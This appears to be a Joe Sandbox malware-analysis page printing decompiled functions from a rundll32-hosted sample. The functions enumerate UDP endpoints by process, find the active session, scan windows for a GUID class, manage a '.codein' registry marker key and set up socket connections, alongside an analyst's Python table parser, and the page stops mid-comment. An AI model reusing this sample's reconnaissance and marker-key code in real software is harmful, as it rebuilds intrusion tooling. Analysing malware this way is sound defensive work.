                                                            				_v16 = _t44 ^ _t106;
                                                            				_push(__esi);
                                                            				_t93 = 0;
                                                            				_v604 = 0;
                                                            				_v600 = 0;
                                                            				_t46 = LoadLibraryA("iphlpapi.dll");
                                                            				if(_t46 == 0) {
                                                            					L4:
                                                            					return E04655AFE(_v16 ^ _t106);
                                                            				} else {
                                                            					_t49 = GetProcAddress(_t46, "GetExtendedUdpTable");
                                                            					_v544 = _t49;
                                                            					_v548 = 0;
                                                            					_t50 =  *_t49(0,  &_v548, 1, 2, 1, 0);
                                                            					_t123 = _t50 - 0x7a;
                                                            					if(_t50 != 0x7a) {
                                                            						goto L4;
                                                            					} else {
                                                            						_push(_v548);
                                                            						_t51 = L04655B55( &_v548, __esi, _t123);
                                                            						_t116 = _t113 + 4;
                                                            						_t100 = _t51;
                                                            						_v552 = _t100;
                                                            						_push(0);
                                                            						_push(1);
                                                            						_push(2);
                                                            						_push(1);
                                                            						_push( &_v548);
                                                            						_push(_t100);
                                                            						if(_v544() == 0) {
                                                            							_t101 = LocalAlloc(0x40, 0x2800);
                                                            							_v556 = 0;
                                                            							_t55 = _v552;
                                                            							__eflags =  *_t55;
                                                            							if( *_t55 > 0) {
                                                            								_t85 =  &(_t55[2]);
                                                            								_v544 = _t85;
                                                            								do {
                                                            									_v596 =  *((intOrPtr*)(_t85 - 4));
                                                            									_t86 =  *((intOrPtr*)(_t85 + 4));
                                                            									_push(_t86);
                                                            									_v592 =  *_t85;
                                                            									_v576 = _t86;
                                                            									E0463D4D0(_t86,  &_v540);
                                                            									_t120 = _t116 + 4;
                                                            									_v560 = 0x22 + lstrlenW( &_v540) * 2 + _t93;
                                                            									_t67 = LocalSize(_t101);
                                                            									_t87 = _v560;
                                                            									__eflags = _t67 - _t87;
                                                            									if(_t67 < _t87) {
                                                            										_t101 = LocalReAlloc(_t101, _t87, 0x42);
                                                            									}
                                                            									asm("movups xmm0, [ebp-0x250]");
                                                            									asm("movups [edi+esi], xmm0");
                                                            									asm("movups xmm0, [ebp-0x240]");
                                                            									asm("movups [edi+esi+0x10], xmm0");
                                                            									_t96 = _t93 + 0x20;
                                                            									E0465E060(_t96 + _t101,  &_v540, 2 + lstrlenW( &_v540) * 2);
                                                            									_t116 = _t120 + 0xc;
                                                            									_t75 = lstrlenW( &_v540);
                                                            									_t91 = _v556 + 1;
                                                            									_t85 = _v544 + 0xc;
                                                            									_v556 = _t91;
                                                            									_v544 = _t85;
                                                            									_t93 = _t96 + _t75 * 2 + 2;
                                                            									__eflags = _t91 -  *_v552;
                                                            								} while (_t91 <  *_v552);
                                                            							}
                                                            							LocalReAlloc(_t101, _t93, 0x42);
                                                            							E04655B47(_v552);
                                                            							__eflags = _v16 ^ _t106;
                                                            							return E04655AFE(_v16 ^ _t106, 0x10);
                                                            						} else {
                                                            							_push(0x10);
                                                            							E04655B47(_t100);
                                                            							goto L4;
                                                            						}
                                                            					}
                                                            				}
                                                            			}
                                                            0x0463d989
                                                            0x0463d990
                                                            0x0463d994
                                                            0x0463d996
                                                            0x0463d99c
                                                            0x0463d9a3
                                                            0x0463d9a6
                                                            0x0463d9a8
                                                            0x0463d9af
                                                            0x0463d9b5
                                                            0x0463d9bb
                                                            0x0463d9c3
                                                            0x0463da2d
                                                            0x0463da41
                                                            0x0463d9c5
                                                            0x0463d9cb
                                                            0x0463d9de
                                                            0x0463d9e6
                                                            0x0463d9ec
                                                            0x0463d9ee
                                                            0x0463d9f1
                                                            0x00000000
                                                            0x0463d9f3
                                                            0x0463d9f3
                                                            0x0463d9f9
                                                            0x0463d9fe
                                                            0x0463da01
                                                            0x0463da09
                                                            0x0463da0f
                                                            0x0463da10
                                                            0x0463da12
                                                            0x0463da14
                                                            0x0463da16
                                                            0x0463da17
                                                            0x0463da20
                                                            0x0463da4f
                                                            0x0463da51
                                                            0x0463da57
                                                            0x0463da5d
                                                            0x0463da5f
                                                            0x0463da65
                                                            0x0463da68
                                                            0x0463da70
                                                            0x0463da79
                                                            0x0463da81
                                                            0x0463da84
                                                            0x0463da85
                                                            0x0463da8b
                                                            0x0463da91
                                                            0x0463da96
                                                            0x0463dab0
                                                            0x0463dab6
                                                            0x0463dabc
                                                            0x0463dac2
                                                            0x0463dac4
                                                            0x0463dad0
                                                            0x0463dad0
                                                            0x0463dad2
                                                            0x0463dae0
                                                            0x0463dae4
                                                            0x0463daeb
                                                            0x0463daf0
                                                            0x0463db0c
                                                            0x0463db11
                                                            0x0463db1b
                                                            0x0463db2d
                                                            0x0463db2e
                                                            0x0463db31
                                                            0x0463db3a
                                                            0x0463db46
                                                            0x0463db49
                                                            0x0463db49
                                                            0x0463da70
                                                            0x0463db55
                                                            0x0463db65
                                                            0x0463db72
                                                            0x0463db81
                                                            0x0463da22
                                                            0x0463da22
                                                            0x0463da25
                                                            0x00000000
                                                            0x0463da2a
                                                            0x0463da20
                                                            0x0463d9f1

                                                            APIs
                                                            • LoadLibraryA.KERNEL32(iphlpapi.dll,00000000), ref: 0463D9BB
                                                            • GetProcAddress.KERNEL32(00000000,GetExtendedUdpTable), ref: 0463D9CB
                                                            • LocalAlloc.KERNEL32(00000040,00002800), ref: 0463DA49
                                                            • lstrlenW.KERNEL32(?), ref: 0463DAA0
                                                            • LocalSize.KERNEL32(00000000), ref: 0463DAB6
                                                            • LocalReAlloc.KERNEL32(00000000,?,00000042), ref: 0463DACA
                                                            • lstrlenW.KERNEL32(?), ref: 0463DAF3
                                                            • lstrlenW.KERNEL32(?), ref: 0463DB1B
                                                            • LocalReAlloc.KERNEL32(00000000,00000000,00000042), ref: 0463DB55
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
• Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$Alloclstrlen$AddressLibraryLoadProcSize
                                                            • String ID: GetExtendedUdpTable$iphlpapi.dll
                                                            • API String ID: 2444183403-1809394930
                                                            • Opcode ID: b10eceb98df718918408174b1c493547b0d56be047125fcbf225630a45aabb8f
                                                            • Instruction ID: 2b44c4254863f07c0eb29247f6c8ecebfca52e72a17a1239bd5dbfd68383e016
                                                            • Opcode Fuzzy Hash: b10eceb98df718918408174b1c493547b0d56be047125fcbf225630a45aabb8f
                                                            • Instruction Fuzzy Hash: 37518C71E40218ABDB20DF65DC8DBE9B7B4EF94301F000199E909A7251EB716E84CF95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
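
The decompiled function above resolves GetExtendedUdpTable from iphlpapi.dll at run time, probes the required size (expecting 0x7a, ERROR_INSUFFICIENT_BUFFER), allocates, calls again with ulAf=2 (AF_INET) and TableClass=1 (UDP_TABLE_OWNER_PID), then walks the result with a 12-byte stride and hands each row's third DWORD to a subroutine that produces a wide string. The following is an added example, written for this page and not code from the sample or from Joe Sandbox, that parses the same MIB_UDPTABLE_OWNER_PID buffer so an analyst can see what the obfuscated loop is extracting: the local address, local port and owning PID of every IPv4 UDP endpoint. The buffer layout is the documented iphlpapi structure; reading the 12-byte rows as (dwLocalAddr, dwLocalPort, dwOwningPid) is an inference from that layout and the stride, and the PID-to-name step (E0463D4D0) is not reproduced. The sample rows are constructed, not captured from the analysed host; on Windows the optional live path makes the same two calls the sample does, on other platforms it is skipped so the parser still runs offline.

```python
import ctypes
import socket
import struct
import sys
from collections import defaultdict

AF_INET = 2                       # ulAf argument seen in the decompiled call
UDP_TABLE_OWNER_PID = 1           # TableClass argument seen in the decompiled call
ERROR_INSUFFICIENT_BUFFER = 0x7A  # the 0x7a the sample expects from the size probe

ROW_SIZE = 12  # sizeof(MIB_UDPROW_OWNER_PID): dwLocalAddr, dwLocalPort, dwOwningPid


def parse_udp_table_owner_pid(buf):
    """Walk a MIB_UDPTABLE_OWNER_PID buffer and return (local_ip, local_port, pid) rows.

    Layout: DWORD dwNumEntries, then dwNumEntries rows of 12 bytes. dwLocalAddr and
    dwLocalPort are stored in network byte order (the port in the low 16 bits), so
    both are decoded from the raw bytes instead of as little-endian integers.
    """
    (count,) = struct.unpack_from("<I", buf, 0)
    need = 4 + count * ROW_SIZE
    if len(buf) < need:
        raise ValueError("table claims %d rows, buffer holds %d bytes" % (count, len(buf)))
    rows = []
    for i in range(count):
        off = 4 + i * ROW_SIZE
        ip = socket.inet_ntoa(buf[off:off + 4])
        (port,) = struct.unpack_from(">H", buf, off + 4)
        (pid,) = struct.unpack_from("<I", buf, off + 8)
        rows.append((ip, port, pid))
    return rows


def build_udp_table_owner_pid(rows):
    """Inverse of the parser; used here only to construct an offline sample buffer."""
    out = struct.pack("<I", len(rows))
    for ip, port, pid in rows:
        out += socket.inet_aton(ip) + struct.pack(">H", port) + b"\x00\x00" + struct.pack("<I", pid)
    return out


def ports_by_pid(rows):
    """Group listening UDP ports by owning process, the per-PID view the sample builds."""
    grouped = defaultdict(list)
    for _ip, port, pid in rows:
        grouped[pid].append(port)
    return dict(grouped)


def query_live_udp_table():
    """Windows only: the same probe-then-fill call pair as the sample.
    Returns None elsewhere so the module imports and runs on any platform."""
    if sys.platform != "win32":
        return None
    fn = ctypes.WinDLL("iphlpapi").GetExtendedUdpTable
    fn.restype = ctypes.c_ulong
    fn.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctypes.c_ulong), ctypes.c_int,
                   ctypes.c_ulong, ctypes.c_int, ctypes.c_ulong]
    size = ctypes.c_ulong(0)
    rc = fn(None, ctypes.byref(size), 1, AF_INET, UDP_TABLE_OWNER_PID, 0)
    if rc != ERROR_INSUFFICIENT_BUFFER:
        raise ctypes.WinError(rc)
    buf = ctypes.create_string_buffer(size.value)
    rc = fn(buf, ctypes.byref(size), 1, AF_INET, UDP_TABLE_OWNER_PID, 0)
    if rc != 0:
        raise ctypes.WinError(rc)
    return parse_udp_table_owner_pid(buf.raw[:size.value])


# Constructed sample rows (not captured from the analysed host): a DNS listener,
# an mDNS socket and an ephemeral port, each owned by a different made-up PID.
SAMPLE_ROWS = [("0.0.0.0", 53, 1234), ("127.0.0.1", 5353, 5678), ("10.0.0.5", 60000, 4242)]
SAMPLE_TABLE = build_udp_table_owner_pid(SAMPLE_ROWS)

if __name__ == "__main__":
    rows = query_live_udp_table() or parse_udp_table_owner_pid(SAMPLE_TABLE)
    for pid, ports in sorted(ports_by_pid(rows).items()):
        print("pid %6d: udp ports %s" % (pid, ports))
```

The length check before the loop is the guard the sample lacks: it trusts dwNumEntries from the first call even though the table can grow between the size probe and the fill, which is why the API is normally called in a retry loop while it keeps returning ERROR_INSUFFICIENT_BUFFER.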

                                                            C-Code - Quality: 43%
                                                            			E046470E0(void* __ebx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				struct _OSVERSIONINFOW _v284;
                                                            				void* _v288;
                                                            				char _v292;
                                                            				_Unknown_base(*)()* _v296;
                                                            				signed int _t26;
                                                            				_Unknown_base(*)()* _t36;
                                                            				struct HINSTANCE__* _t37;
                                                            				_Unknown_base(*)()* _t38;
                                                            				signed int _t43;
                                                            				signed int _t44;
                                                            				intOrPtr* _t50;
                                                            				intOrPtr* _t54;
                                                            				intOrPtr* _t55;
                                                            				intOrPtr _t58;
                                                            				signed int _t60;
                                                            				struct HINSTANCE__* _t62;
                                                            				intOrPtr _t64;
                                                            				signed int _t66;
                                                            
                                                            				_t26 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t26 ^ _t66;
                                                            				_t60 = 0;
                                                            				E0465DEA0(0,  &_v284, 0, 0x114);
                                                            				_v284.dwOSVersionInfoSize = 0x114;
                                                            				GetVersionExW( &_v284);
                                                            				if(_v284.dwMajorVersion < 6) {
                                                            					L24:
                                                            					return E04655AFE(_v8 ^ _t66);
                                                            				} else {
                                                            					_t62 = LoadLibraryA("Wtsapi32.dll");
                                                            					if(_t62 != 0) {
                                                            						_t50 = GetProcAddress(_t62, "WTSEnumerateSessionsW");
                                                            						_t36 = GetProcAddress(_t62, "WTSFreeMemory");
                                                            						_v296 = _t36;
                                                            						if(_t50 == 0 || _t36 == 0) {
                                                            							L20:
                                                            							_t37 = LoadLibraryA("Kernel32.dll");
                                                            							if(_t37 != 0) {
                                                            								_t38 = GetProcAddress(_t37, "WTSGetActiveConsoleSessionId");
                                                            								if(_t38 != 0) {
                                                            									_t60 =  *_t38();
                                                            								}
                                                            							}
                                                            						} else {
                                                            							_v292 = 0;
                                                            							_push( &_v288);
                                                            							_v288 = 0;
                                                            							_push( &_v292);
                                                            							_push(1);
                                                            							_push(0);
                                                            							_push(0);
                                                            							if( *_t50() == 0) {
                                                            								goto L20;
                                                            							} else {
                                                            								_t58 = _v288;
                                                            								_t43 = 0;
                                                            								_t64 = _v292;
                                                            								if(_t58 == 0) {
                                                            									L12:
                                                            									_t44 = 0;
                                                            									if(_t58 != 0) {
                                                            										_t54 = _t64 + 8;
                                                            										while( *_t54 != 1) {
                                                            											_t44 = _t44 + 1;
                                                            											_t54 = _t54 + 0xc;
                                                            											if(_t44 < _t58) {
                                                            												continue;
                                                            											} else {
                                                            											}
                                                            											goto L18;
                                                            										}
                                                            										_t60 =  *((intOrPtr*)(_t64 + (_t44 + _t44 * 2) * 4));
                                                            									}
                                                            								} else {
                                                            									_t55 = _t64 + 8;
                                                            									while( *_t55 != _t60) {
                                                            										_t43 = _t43 + 1;
                                                            										_t55 = _t55 + 0xc;
                                                            										if(_t43 < _t58) {
                                                            											continue;
                                                            										} else {
                                                            											goto L12;
                                                            										}
                                                            										goto L18;
                                                            									}
                                                            									_t60 =  *((intOrPtr*)(_t64 + (_t43 + _t43 * 2) * 4));
                                                            									if(_t60 == 0) {
                                                            										goto L12;
                                                            									}
                                                            								}
                                                            								L18:
                                                            								_v296(_t64);
                                                            								if(_t60 == 0) {
                                                            									goto L20;
                                                            								}
                                                            							}
                                                            						}
                                                            						goto L24;
                                                            					} else {
                                                            						return E04655AFE(_v8 ^ _t66);
                                                            					}
                                                            				}
                                                            			}

                                                            APIs
                                                            • GetVersionExW.KERNEL32(00000114,?,00000104,00000000), ref: 0464711D
                                                            • LoadLibraryA.KERNEL32(Wtsapi32.dll,?,00000104,00000000), ref: 04647135
                                                            • GetProcAddress.KERNEL32(00000000,WTSEnumerateSessionsW), ref: 04647158
                                                            • GetProcAddress.KERNEL32(00000000,WTSFreeMemory), ref: 0464716C
                                                            • LoadLibraryA.KERNEL32(Kernel32.dll,?,00000104,00000000), ref: 0464720C
                                                            • GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 0464721C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad$Version
                                                            • String ID: Kernel32.dll$WTSEnumerateSessionsW$WTSFreeMemory$WTSGetActiveConsoleSessionId$Wtsapi32.dll
                                                            • API String ID: 158333003-4205620339
                                                            • Opcode ID: 09644f545ae3a927d97650bd52d0b14faa892dbf836a65258e717334d4220174
                                                            • Instruction ID: 951de69c9f7f31422a13a17d2f0c9590d65a11a9492baa840c0fad83c02c9f0e
                                                            • Opcode Fuzzy Hash: 09644f545ae3a927d97650bd52d0b14faa892dbf836a65258e717334d4220174
                                                            • Instruction Fuzzy Hash: 73319331A002199BDF29DA65DC49AEA73B9EBD9711F1404A9EA09D7240FF30FA45CE50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 91%
                                                            			E046451C0(void* __ebx, void* __edi, void* __esi, struct HWND__* _a4, void** _a8) {
                                                            				signed int _v8;
                                                            				char _v1032;
                                                            				char _v2056;
                                                            				struct HWND__* _v2060;
                                                            				void** _v2064;
                                                            				signed int _t20;
                                                            				void** _t22;
                                                            				signed int _t33;
                                                            				signed int _t34;
                                                            				int _t44;
                                                            				void* _t50;
                                                            				char* _t53;
                                                            				void* _t56;
                                                            				intOrPtr _t57;
                                                            				void* _t58;
                                                            				void* _t59;
                                                            				CHAR* _t61;
                                                            				struct HWND__* _t63;
                                                            				int _t64;
                                                            				DWORD* _t65;
                                                            				signed int _t66;
                                                            
                                                            				_t58 = __edi;
                                                            				_t20 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t20 ^ _t66;
                                                            				_t22 = _a8;
                                                            				_t63 = _a4;
                                                            				_t50 =  *_t22;
                                                            				_v2064 = _t22;
                                                            				_v2060 = _t63;
                                                            				E0465DEA0(__edi,  &_v2056, 0, 0x400);
                                                            				E0465DEA0(_t58,  &_v1032, 0, 0x400);
                                                            				GetClassNameA(_t63,  &_v1032, 0x3ff);
                                                            				if(lstrlenA( &_v1032) == 0) {
                                                            					L14:
                                                            					return E04655AFE(_v8 ^ _t66);
                                                            				}
                                                            				_t53 = "5B3838F5-0C81-46D9-A4C0-6EA28CA3E942";
                                                            				_t33 =  &_v1032;
                                                            				while(1) {
                                                            					_t56 =  *_t33;
                                                            					if(_t56 !=  *_t53) {
                                                            						break;
                                                            					}
                                                            					if(_t56 == 0) {
                                                            						L6:
                                                            						_t34 = 0;
                                                            						L8:
                                                            						if(_t34 == 0) {
                                                            							_push(_t58);
                                                            							GetWindowTextA(_t63,  &_v2056, 0x3ff);
                                                            							_t59 = E0465DA60( &_v2056, 0x5f);
                                                            							if(_t59 != 0) {
                                                            								_t61 = _t59 + 1;
                                                            								if(_t50 == 0) {
                                                            									_t50 = LocalAlloc(0x40, 1);
                                                            								}
                                                            								_t64 = LocalSize(_t50);
                                                            								_t15 = lstrlenA(_t61) + 5; // 0x5
                                                            								_t50 = LocalReAlloc(_t50, _t15 + _t64, 0x42);
                                                            								_t65 = _t64 + _t50;
                                                            								GetWindowThreadProcessId(_v2060, _t65);
                                                            								_t44 = lstrlenA(_t61);
                                                            								_t17 =  &(_t65[1]); // 0x4
                                                            								E0465E060(_t17, _t61, _t44 + 1);
                                                            							}
                                                            							 *_v2064 = _t50;
                                                            						}
                                                            						goto L14;
                                                            					}
                                                            					_t57 =  *((intOrPtr*)(_t33 + 1));
                                                            					if(_t57 != _t53[1]) {
                                                            						break;
                                                            					}
                                                            					_t33 = _t33 + 2;
                                                            					_t53 =  &(_t53[2]);
                                                            					if(_t57 != 0) {
                                                            						continue;
                                                            					}
                                                            					goto L6;
                                                            				}
                                                            				asm("sbb eax, eax");
                                                            				_t34 = _t33 | 0x00000001;
                                                            				goto L8;
                                                            			}

                                                            APIs
                                                            • GetClassNameA.USER32(?,?,000003FF), ref: 0464521F
                                                            • lstrlen.KERNEL32(?), ref: 0464522C
                                                            • GetWindowTextA.USER32(?,?,000003FF), ref: 04645280
                                                            • _strrchr.LIBCMT ref: 0464528F
                                                            • LocalAlloc.KERNEL32(00000040,00000001), ref: 046452A6
                                                            • LocalSize.KERNEL32 ref: 046452AF
                                                            • lstrlen.KERNEL32(00000001), ref: 046452B8
                                                            • LocalReAlloc.KERNEL32(?,00000005,00000042), ref: 046452C7
                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 046452D8
                                                            • lstrlen.KERNEL32(00000001,?,00000005,00000042), ref: 046452DF
                                                            Strings
                                                            • 5B3838F5-0C81-46D9-A4C0-6EA28CA3E942, xrefs: 0464523A
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Locallstrlen$AllocWindow$ClassNameProcessSizeTextThread_strrchr
                                                            • String ID: 5B3838F5-0C81-46D9-A4C0-6EA28CA3E942
                                                            • API String ID: 414574500-3141347713
                                                            • Opcode ID: d6bd6197ee46f098211ff43085ca1d823afe95a7673ff5f473e05b0be16aacb3
                                                            • Instruction ID: d2072ca9a218172ceeb7334b4079ac2bac714edf3fb8f98d2822d01589b08be5
                                                            • Opcode Fuzzy Hash: d6bd6197ee46f098211ff43085ca1d823afe95a7673ff5f473e05b0be16aacb3
                                                            • Instruction Fuzzy Hash: D331E7B2A00209ABDB109F60DC89FAB77BDEF54700F0450A5EB4AD7241FF35AE458B54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			// Creates or removes the marker key SOFTWARE\Classes\.codein in both
                                                            			// HKEY_LOCAL_MACHINE (0x80000002) and HKEY_CURRENT_USER (0x80000001).
                                                            			// __ecx == 0 creates the key and sets the flag at +0x38 of the global
                                                            			// object; __ecx != 0 deletes the key and clears that flag.
                                                            			// samDesired values: 0x104 = KEY_CREATE_SUB_KEY | KEY_WOW64_64KEY,
                                                            			// 0x20106 = KEY_WRITE | KEY_WOW64_64KEY. KEY_WOW64_64KEY makes this
                                                            			// 32-bit code address the native 64-bit registry view instead of
                                                            			// the WOW64-redirected one.
                                                            			E04636400(void* __ebx, void* __ecx) {
                                                            				void* _v8;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				void* _t17;
                                                            				void* _t20;
                                                            				intOrPtr _t21;
                                                            				intOrPtr _t27;
                                                            				void* _t37;
                                                            				void* _t40;
                                                            
                                                            				// Lazily build the global object at 0x46878d0 (the subcall E046362B0
                                                            				// opens the same key read-only with 0x20119 = KEY_READ | KEY_WOW64_64KEY).
                                                            				_t45 =  *0x46878d0;
                                                            				_t40 = __ecx;
                                                            				if( *0x46878d0 == 0) {
                                                            					 *0x46878d0 = E046362B0(__ebx, L04655B14(__ecx, _t45, 0x3c), _t37);
                                                            				}
                                                            				_v8 = 0;
                                                            				if(_t40 == 0) {
                                                            					// Create path: HKLM first, then HKCU. Each handle is closed at once;
                                                            					// only the key's existence is used.
                                                            					RegCreateKeyExW(0x80000002, L"SOFTWARE\\Classes\\.codein", 0, 0, 0, 0x104, 0,  &_v8, 0);
                                                            					_t17 = _v8;
                                                            					__eflags = _t17;
                                                            					if(_t17 != 0) {
                                                            						RegCloseKey(_t17);
                                                            					}
                                                            					_v8 = 0;
                                                            					RegCreateKeyExW(0x80000001, L"SOFTWARE\\Classes\\.codein", 0, 0, 0, 0x104, 0,  &_v8, 0);
                                                            					_t20 = _v8;
                                                            					__eflags = _t20;
                                                            					if(_t20 != 0) {
                                                            						RegCloseKey(_t20);
                                                            					}
                                                            					_t21 =  *0x46878d0; // 0x0
                                                            					 *((intOrPtr*)(_t21 + 0x38)) = 1; // flag: marker key present
                                                            					return _t21;
                                                            				} else {
                                                            					// Remove path: open with KEY_WRITE | KEY_WOW64_64KEY and delete the
                                                            					// subtree named by the string at 0x467c5d0 (shown only as a pointer here).
                                                            					if(RegOpenKeyExW(0x80000002, L"SOFTWARE\\Classes\\.codein", 0, 0x20106,  &_v8) == 0) {
                                                            						SHDeleteKeyW(_v8, 0x467c5d0);
                                                            						RegCloseKey(_v8);
                                                            					}
                                                            					_v8 = 0;
                                                            					if(RegOpenKeyExW(0x80000001, L"SOFTWARE\\Classes\\.codein", 0, 0x20106,  &_v8) == 0) {
                                                            						SHDeleteKeyW(_v8, 0x467c5d0);
                                                            						RegCloseKey(_v8);
                                                            					}
                                                            					_t27 =  *0x46878d0; // 0x0
                                                            					 *(_t27 + 0x38) = 0; // flag: marker key removed
                                                            					return _t27;
                                                            				}
                                                            			}

                                                            APIs
                                                            • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Classes\.codein,00000000,00020106,00000000), ref: 04636449
                                                            • SHDeleteKeyW.SHLWAPI(00000000,0467C5D0), ref: 04636467
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0463646C
                                                            • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Classes\.codein,00000000,00020106,00000000), ref: 0463648A
                                                            • SHDeleteKeyW.SHLWAPI(00000000,0467C5D0), ref: 0463649C
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 046364A1
                                                              • Part of subcall function 046362B0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Classes\.codein,00000000,00020119,0464B6FC,?,04686318,?,?,0464B6FC), ref: 04636360
                                                              • Part of subcall function 046362B0: RegCloseKey.ADVAPI32(0464B6FC,?,04686318,?,?,0464B6FC), ref: 0463636D
                                                            • RegCreateKeyExW.ADVAPI32(80000002,SOFTWARE\Classes\.codein,00000000,00000000,00000000,00000104,00000000,00000000,00000000), ref: 046364D5
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 046364E5
                                                            • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Classes\.codein,00000000,00000000,00000000,00000104,00000000,00000000,00000000), ref: 0463650B
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 04636515
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close$Open$CreateDelete
                                                            • String ID: SOFTWARE\Classes\.codein
                                                            • API String ID: 185900105-3041101089
                                                            • Opcode ID: 987524cfd639fcee699400f62f3db0218d363d7af3b820294be1e10d82825a2e
                                                            • Instruction ID: 47eb3c03fb2c8be3eba807b097aa29e90cadea96bd2bce74c09c660bc695dc7d
                                                            • Opcode Fuzzy Hash: 987524cfd639fcee699400f62f3db0218d363d7af3b820294be1e10d82825a2e
                                                            • Instruction Fuzzy Hash: AA312170B80318FBEB20DB55DD0AF597BA8EB40B15F304065BA04B7291F7B47E10DA59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 34%
                                                            			// Allocates a per-connection context, switches the socket to
                                                            			// non-blocking mode and associates it with the worker's I/O
                                                            			// completion port. The prologue loads the /GS stack cookie from
                                                            			// 0x4684008. Quality is 34%: the decompiler has merged the start
                                                            			// of the following function into the fail-fast branch (after the
                                                            			// int3 padding), so the code after label L22 is not part of this
                                                            			// routine.
                                                            			E04654090(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, char _a4, char _a12, intOrPtr* _a16, intOrPtr _a20) {
                                                            				signed int _v8;
                                                            				char _v12;
                                                            				char _v16;
                                                            				void* _v20;
                                                            				intOrPtr* _v24;
                                                            				intOrPtr* _v28;
                                                            				signed int _v44;
                                                            				char _v48;
                                                            				intOrPtr _v52;
                                                            				intOrPtr _v56;
                                                            				signed int _v68;
                                                            				intOrPtr _v72;
                                                            				char _v76;
                                                            				signed int _t73;
                                                            				void* _t79;
                                                            				long _t85;
                                                            				long _t89;
                                                            				long _t92;
                                                            				signed int _t94;
                                                            				signed int _t103;
                                                            				void* _t104;
                                                            				signed int _t105;
                                                            				long _t106;
                                                            				void* _t115;
                                                            				intOrPtr* _t120;
                                                            				intOrPtr _t121;
                                                            				signed int _t135;
                                                            				intOrPtr* _t139;
                                                            				long _t140;
                                                            				struct _CRITICAL_SECTION* _t144;
                                                            				intOrPtr _t146;
                                                            				intOrPtr _t148;
                                                            				signed int _t149;
                                                            				signed int _t150;
                                                            				signed int _t151;
                                                            
                                                            				_t73 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t73 ^ _t149;
                                                            				_push(__ebx);
                                                            				_push(__esi);
                                                            				_v12 = _a4;
                                                            				_push(__edi);
                                                            				_t139 = __ecx;
                                                            				_v16 = _a12;
                                                            				_v28 = _a16;
                                                            				_v24 = __ecx;
                                                            				_v20 = 0;
                                                            				_t79 = E0464C880(__ecx + 0xb0,  &_v20);
                                                            				_t155 = _t79;
                                                            				if(_t79 != 0) {
                                                            					_t115 = _v20;
                                                            				} else {
                                                            					_t148 =  *((intOrPtr*)(__ecx + 0xa4));
                                                            					_t115 = RtlAllocateHeap( *(__ecx + 0x94), 0, _t148 + 0x38);
                                                            					_v20 = _t115;
                                                            					_t17 = _t115 + 0x38; // 0x38
                                                            					 *(_t115 + 0x14) = _t139 + 0x94;
                                                            					 *((intOrPtr*)(_t115 + 0x24)) = _t148;
                                                            					 *((intOrPtr*)(_t115 + 0x20)) = _t17;
                                                            				}
                                                            				_push(_v16);
                                                            				asm("xorps xmm0, xmm0");
                                                            				_push(_v12);
                                                            				asm("movups [ebx], xmm0");
                                                            				 *(_t115 + 0x10) = 0;
                                                            				 *(_t115 + 0x1c) = 0;
                                                            				 *(_t115 + 0x1c) =  *(_t139 + 0x18);
                                                            				_t140 = E046527F0(_t139, _t155);
                                                            				_t28 = _t140 + 0x54; // 0x54
                                                            				_t144 = _t28;
                                                            				EnterCriticalSection(_t144);
                                                            				_push(_a20);
                                                            				_t120 = _v24;
                                                            				E04652A10(_t120, _t144, _v12, _t140, _v28, _t139);
                                                            				if( *((intOrPtr*)(_v24 + 0x4c)) == 0) {
                                                            					_t120 = _v28;
                                                            					// sa_family == AF_INET (2) selects namelen 0x10 (sockaddr_in),
                                                            					// anything else 0x1c (sockaddr_in6).
                                                            					__eflags =  *_t120 - 2;
                                                            					_t85 =  !=  ? 0x1c : 0x10;
                                                            					// ws2_32 ordinal 4 = connect(s, name, namelen). The literal 0x10 in
